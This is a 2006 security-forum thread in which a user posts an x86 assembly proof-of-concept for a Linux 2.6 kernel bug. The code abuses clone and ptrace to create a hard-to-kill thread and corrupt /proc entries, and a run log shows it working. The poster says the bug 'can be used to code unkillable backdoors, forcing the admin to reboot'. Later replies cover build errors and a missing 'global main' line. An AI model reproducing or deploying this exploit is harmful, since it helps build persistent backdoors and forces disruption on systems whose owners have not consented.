 |
|
 |
 |
|
 |
IT Security and Insecurity Portal |
|
 |
NEW! Unkillable thread + procfs corruption |
 |
 Posted: Tue Jan 10, 2006 4:28 pm |
 |
|
| erg0t |
| Valuable expert |
 |
|
| Joined: Apr 08, 2005 |
| Posts: 55 |
| Location: Uruguay |
|
|
 |
|
 |
|
This is a new PoC of the old bug I found, now it can run the thread!!!
And in the old bug, the thread could be killed re-attaching it, now it can't!!!
And one more thing, some of the ProcFS info is corrupted, so you can't see some things as maps, mem, and tasks.
I'm testing on a 2.6.11, last time on a 2.6.13 the old version worked.
A friend toldme that in 2.6.14 you can kill it 
Please try it and post your results!
This bug can be used to code unkillable backdoors, forcing the admin to reboot
| Quote: |
CLONE_VM equ 0x00000100
CLONE_THREAD equ 0x00010000
CLONE_SIGHAND equ 0x00000800
SIGCHLD equ 17
[extern printf]
[section .data]
forked db " >> fork: %d",10,0
[section .text]
no_child:
push eax
push forked
call printf
xor ebx, ebx
mov eax, 1
call 0xffffe400
bad:
[section .data]
..@4.cadena: db " !! Can't create thread",10
[section .text]
mov ebx, 1
mov ecx, ..@4.cadena
mov edx, 23+1
mov eax, 4
call 0xffffe400
mov ebx, -1
mov eax, 1
call 0xffffe400
main:
mov eax, 2
call 0xffffe400
test eax, eax
jnz no_child
[section .data]
..@13.cadena: db " >> Creating thread...",10
[section .text]
mov ebx, 1
mov ecx, ..@13.cadena
mov edx, 22+1
mov eax, 4
call 0xffffe400
mov ebx, CLONE_VM | CLONE_THREAD | CLONE_SIGHAND | SIGCHLD
xor ecx, ecx
mov eax, 120
call 0xffffe400
test eax, eax
jz child
test eax, 0x80000000
jnz bad
xor ebx, ebx
mov eax, 1
call 0xffffe400
child:
xor ebx, ebx
mov eax, 26
call 0xffffe400
test eax, eax
jnz bad2
[section .data]
..@26.cadena: db " >> Thread attached and running",10
[section .text]
mov ebx, 1
mov ecx, ..@26.cadena
mov edx, 31+1
mov eax, 4
call 0xffffe400
aki: jmp aki
bad2:
[section .data]
..@32.cadena: db " !! Can't attach",10
[section .text]
mov ebx, 1
mov ecx, ..@32.cadena
mov edx, 16+1
mov eax, 4
call 0xffffe400
mov ebx, -1
mov eax, 1
call 0xffffe400
|
| Quote: |
erg0t nasm # nasm -felf test.asm ; gcc test.o -o test ; ./test
>> Creating thread...
>> fork: 8407
erg0t nasm # >> Thread attached and running
killall -9 test ; ps -A | grep test
8407 pts/0 00:00:27 test <defunct>
erg0t nasm # ls /proc/8407
auxv cmdline cwd environ exe fd maps mem mounts oom_adj oom_score root stat statm status task
erg0t nasm # cat /proc/8407/*
cat: /proc/8407/cwd: No existe el fichero o el directorio
cat: /proc/8407/exe: No existe el fichero o el directorio
cat: /proc/8407/fd: No existe el fichero o el directorio
cat: /proc/8407/mem: No existe el fichero o el directorio
cat: /proc/8407/mounts: Argumento inv?lido
0
0
cat: /proc/8407/root: No existe el fichero o el directorio
8407 (test) Z 1 8406 7842 34816 8417 76 1 0 0 0 2764 5 0 0 17 0 2 0 1002050 0 0 4294967295 0 0 0 0 0 256 0 0 0 4294967295 0 0 17 0 0 0
0 0 0 0 0 0 0
Name: test
State: Z (zombie)
SleepAVG: 58%
Tgid: 8407
Pid: 8407
PPid: 1
TracerPid: 0
Uid: 0 0 0 0
Gid: 0 0 0 0
FDSize: 0
Groups: 0 1 2 3 4 6 10 11 20 26 27
Threads: 2
SigPnd: 0000000000000100
ShdPnd: 0000000000000100
SigBlk: 0000000080000000
SigIgn: 0000000000000000
SigCgt: 0000000000000000
CapInh: 0000000000000000
CapPrm: 00000000fffffeff
CapEff: 00000000fffffeff
cat: /proc/8407/task: No existe el fichero o el directorio
erg0t nasm # uname -a
Linux erg0t 2.6.11 #1 Tue Dec 13 19:38:25 GMT 2005 i686 AMD Athlon(tm) XP 2000+ AuthenticAMD GNU/Linux
|
|
|
|
|
|
|
|
|
|
| Posted: Tue Jan 10, 2006 5:33 pm |
|
|
| erg0t |
| Valuable expert |
|
|
| Joined: Apr 08, 2005 |
| Posts: 55 |
| Location: Uruguay |
|
|
|
|
|
|
well, I did some more tests, and the thread is terminated, but the structures still there, so is really killed
I will try to do some more tests to se if I can find a way to keep the thread running |
|
|
|
|
| Posted: Wed Jan 11, 2006 10:41 am |
|
|
| fizzi |
| Advanced user |
 |
|
| Joined: Sep 14, 2005 |
| Posts: 55 |
|
|
|
|
|
|
|
hi
i tried to compilie your progg under amd64 but it didn't work. i got kernel 2.6.15 and i get
| Quote: | /usr/lib/gcc/x86_64-slackware-linux/3.4.4/../../../../x86_64-slackware-linux/bin/ld: warning: i386 architecture of input file `test.o' is incompatible with i386:x86-64 output
/usr/lib/gcc/x86_64-slackware-linux/3.4.4/../../../../lib64/crt1.o(.text+0x21): In function `_start':
../sysdeps/x86_64/elf/start.S:109: undefined reference to `main'
|
perhaps u can tell me to get this thing compiled for amd64 or 32bit arch. |
|
|
|
|
|
|
|
|
| Posted: Wed Jan 11, 2006 2:42 pm |
|
|
| erg0t |
| Valuable expert |
|
|
| Joined: Apr 08, 2005 |
| Posts: 55 |
| Location: Uruguay |
|
|
|
|
|
|
| fizzi wrote: | hi
i tried to compilie your progg under amd64 but it didn't work. i got kernel 2.6.15 and i get
| Quote: | /usr/lib/gcc/x86_64-slackware-linux/3.4.4/../../../../x86_64-slackware-linux/bin/ld: warning: i386 architecture of input file `test.o' is incompatible with i386:x86-64 output
/usr/lib/gcc/x86_64-slackware-linux/3.4.4/../../../../lib64/crt1.o(.text+0x21): In function `_start':
../sysdeps/x86_64/elf/start.S:109: undefined reference to `main'
|
perhaps u can tell me to get this thing compiled for amd64 or 32bit arch. |
Is only for x86 |
|
|
|
|
| Posted: Wed Jan 11, 2006 3:09 pm |
|
|
| fizzi |
| Advanced user |
|
|
| Joined: Sep 14, 2005 |
| Posts: 55 |
|
|
|
|
|
|
|
yeah, but isn't amd64 compatible to 32bit programs?
so, this should also work on my x86_64 architecture, but it just won't compile. |
|
|
|
|
|
|
|
|
| Posted: Thu Jan 12, 2006 1:21 am |
|
|
| shai-tan |
| Valuable expert |
|
|
| Joined: Feb 22, 2005 |
| Posts: 477 |
|
|
|
|
|
|
|
Hey erg0t hows everything holding up? Ah isnt assembly great...
Anywayz:
| Code: |
shai-tan@Shai-tan:~$ nasm -felf test.asm ; gcc test.o -o test
/usr/lib/gcc/i486-linux-gnu/4.0.2/../../../../lib/crt1.o: In function `_start':
../sysdeps/i386/elf/start.S:115: undefined reference to `main'
collect2: ld returned 1 exit status
|
This is on 2.6.12
Bloody hell I wish the kernel team had made a 2.7 development kernel because at the moment so much crap is streaming into the kernel. I think by version 3.0 a re-write will be needed. To keep the Linux kernel up to the likes of the new GNU/Hurd kernel.
Shai-tan |
|
_________________
Shai-tan
?In short: just say NO TO DRUGS, and maybe you won?t end up like the Hurd people.? -- Linus Torvalds |
|
|
|
|
|
|
|
| Posted: Thu Jan 12, 2006 3:32 pm |
|
|
| erg0t |
| Valuable expert |
|
|
| Joined: Apr 08, 2005 |
| Posts: 55 |
| Location: Uruguay |
|
|
|
|
|
|
| shai-tan wrote: | Hey erg0t hows everything holding up? Ah isnt assembly great...
Anywayz:
| Code: |
shai-tan@Shai-tan:~$ nasm -felf test.asm ; gcc test.o -o test
/usr/lib/gcc/i486-linux-gnu/4.0.2/../../../../lib/crt1.o: In function `_start':
../sysdeps/i386/elf/start.S:115: undefined reference to `main'
collect2: ld returned 1 exit status
|
This is on 2.6.12
Bloody hell I wish the kernel team had made a 2.7 development kernel because at the moment so much crap is streaming into the kernel. I think by version 3.0 a re-write will be needed. To keep the Linux kernel up to the likes of the new GNU/Hurd kernel.
Shai-tan |
Hi, I have NASM version 0.98.39 compiled on Dec 15 2005 and
gcc versi?n 3.3.6 (Gentoo 3.3.6, ssp-3.3.6-1.0, pie-8.7.
btw I send a patch of another bug in clone and was added to the -mm tree
Is called i386-sys_clone-from-vsyscall.patch
I'm very happy  |
|
|
|
|
|
|
|
|
| Posted: Thu Jan 12, 2006 5:21 pm |
|
|
| shai-tan |
| Valuable expert |
|
|
| Joined: Feb 22, 2005 |
| Posts: 477 |
|
|
|
|
|
|
|
Ah maybe its gcc 4.0 which is breaking it.
Shai-tan |
|
_________________
Shai-tan
?In short: just say NO TO DRUGS, and maybe you won?t end up like the Hurd people.? -- Linus Torvalds |
|
|
|
|
|
|
|
| Posted: Thu Jan 12, 2006 7:29 pm |
|
|
| fizzi |
| Advanced user |
|
|
| Joined: Sep 14, 2005 |
| Posts: 55 |
|
|
|
|
|
|
|
| shai-tan wrote: | Hey erg0t hows everything holding up? Ah isnt assembly great...
Anywayz:
| Code: |
shai-tan@Shai-tan:~$ nasm -felf test.asm ; gcc test.o -o test
/usr/lib/gcc/i486-linux-gnu/4.0.2/../../../../lib/crt1.o: In function `_start':
../sysdeps/i386/elf/start.S:115: undefined reference to `main'
collect2: ld returned 1 exit status
|
This is on 2.6.12
Bloody hell I wish the kernel team had made a 2.7 development kernel because at the moment so much crap is streaming into the kernel. I think by version 3.0 a re-write will be needed. To keep the Linux kernel up to the likes of the new GNU/Hurd kernel.
Shai-tan |
As i can see, this is the same error message i get when i try to compile this thingy. but i got amd64 and gcc 3.4.4
"undefined reference to main" ... seems he cant find the main routine. so ... any other linker or compiler i can choose? |
|
|
|
|
|
|
|
|
| Posted: Thu Jan 12, 2006 7:37 pm |
|
|
| fizzi |
| Advanced user |
|
|
| Joined: Sep 14, 2005 |
| Posts: 55 |
|
|
|
|
|
|
|
| Quote: | gcc -nostartfiles -o test test.o
/usr/lib/gcc/x86_64-slackware-linux/3.4.4/../../../../x86_64-slackware-linux/bin/ld: warning: i386 architecture of input file `test.o' is incompatible with i386:x86-64 output |
Ok, i'm getting closer ... |
|
|
|
|
| Posted: Thu Jan 12, 2006 7:47 pm |
|
|
| fizzi |
| Advanced user |
|
|
| Joined: Sep 14, 2005 |
| Posts: 55 |
|
|
|
|
|
|
|
| Quote: | gcc -nostartfiles -m32 -o test -pipe -march=i386 -mcpu=i686 -fno-strength-reduce -fno-strict-aliasing -pipe test.o
collect2: ld terminated with signal 11 [Segmentation fault] |
i give up |
|
|
|
|
| Posted: Thu Jan 12, 2006 8:07 pm |
|
|
| erg0t |
| Valuable expert |
|
|
| Joined: Apr 08, 2005 |
| Posts: 55 |
| Location: Uruguay |
|
|
|
|
|
|
| fizzi wrote: | | Quote: | gcc -nostartfiles -m32 -o test -pipe -march=i386 -mcpu=i686 -fno-strength-reduce -fno-strict-aliasing -pipe test.o
collect2: ld terminated with signal 11 [Segmentation fault] |
i give up |
The problem is that nasm generates code only for x86, maybe you can convert the code to gas. |
|
|
|
|
| Posted: Fri Jan 13, 2006 6:05 am |
|
|
| shai-tan |
| Valuable expert |
|
|
| Joined: Feb 22, 2005 |
| Posts: 477 |
|
|
|
|
|
|
|
Well I use x86 and why is it not working?
Shai-tan |
|
_________________
Shai-tan
?In short: just say NO TO DRUGS, and maybe you won?t end up like the Hurd people.? -- Linus Torvalds |
|
|
|
| Posted: Fri Jan 13, 2006 10:02 am |
|
|
| erg0t |
| Valuable expert |
|
|
| Joined: Apr 08, 2005 |
| Posts: 55 |
| Location: Uruguay |
|
|
|
|
|
|
| shai-tan wrote: | Well I use x86 and why is it not working?
Shai-tan |
Sorry, I know what is happening, I use lot of macros I made for my code, so to get a code that everyone could compile I used nasm -e and posted the output, but by mistake I didn't select one line before containing [global main]. So to get the code working you have to add global main to the top of the code. |
|
|
|
|
| Posted: Fri Jan 13, 2006 10:17 am |
|
|
| shai-tan |
| Valuable expert |
|
|
| Joined: Feb 22, 2005 |
| Posts: 477 |
|
|
|
|
|
|
|
Ah I see.
Thanks. I'll get round to it later cause Im a bit busy tonight. Ill tell you what happens
Shai-tan |
|
_________________
Shai-tan
?In short: just say NO TO DRUGS, and maybe you won?t end up like the Hurd people.? -- Linus Torvalds |
|
|
|
www.waraxe.us Forum Index -> Linux world
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
|
All times are GMT
Page 1 of 2
Goto page 1, 2Next
|
|
|
|
Powered by phpBB © 2001-2008 phpBB Group
|
|
|
|
|
Discussions
Tools
Content
Info
Membership:
Latest: 
New Today: 0
New Yesterday: 0
Overall: 9144
People Online:
Visitors: 71
Members: 0
Total: 71
